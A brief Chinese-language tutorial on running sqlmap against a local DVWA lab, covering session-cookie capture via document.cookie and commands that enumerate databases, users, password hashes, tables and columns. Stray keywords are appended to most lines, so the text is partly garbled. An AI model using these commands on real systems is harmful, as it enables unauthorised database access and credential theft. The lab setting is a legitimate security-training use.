sqlmap支持五种不一样的注入模式:javascript
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDBjava
登陆网页后在浏览器url栏输入 javascript:document.cookie或者在console栏中输入document.cookie便可得到cookiemysql
sqlmap -u "http://可能注入的某个提交参数的url" --cookie="此次提交的cookie"sql
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=1129umpqj3j5siclohbkmik7nu" --level 3
--level 表明扫描等级,范围1~5。数值越大扫描越完整数据库
--batch --dbs 获取全部数据库浏览器
--current-db 当前使用的数据库cookie
--current-user 数据库使用帐户session
--users 全部用户dom
--passwords 数据库帐户与密码工具
-D dvwa --tables 查看指定数据库(例如:dvwa)的全部表
-D dvwa -T users --columns 查看指定数据库指定表的全部字段
执行完以后结果以下
显示结果被记录在/root/.sqlmap/output/127.0.0.1下面
log是注入的日志,target.txt是执行的sqlmap命令,session.sqlite能够用sqlitespy查看书库内容
可使用burpsuite或者temperdata等工具来抓取post包
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数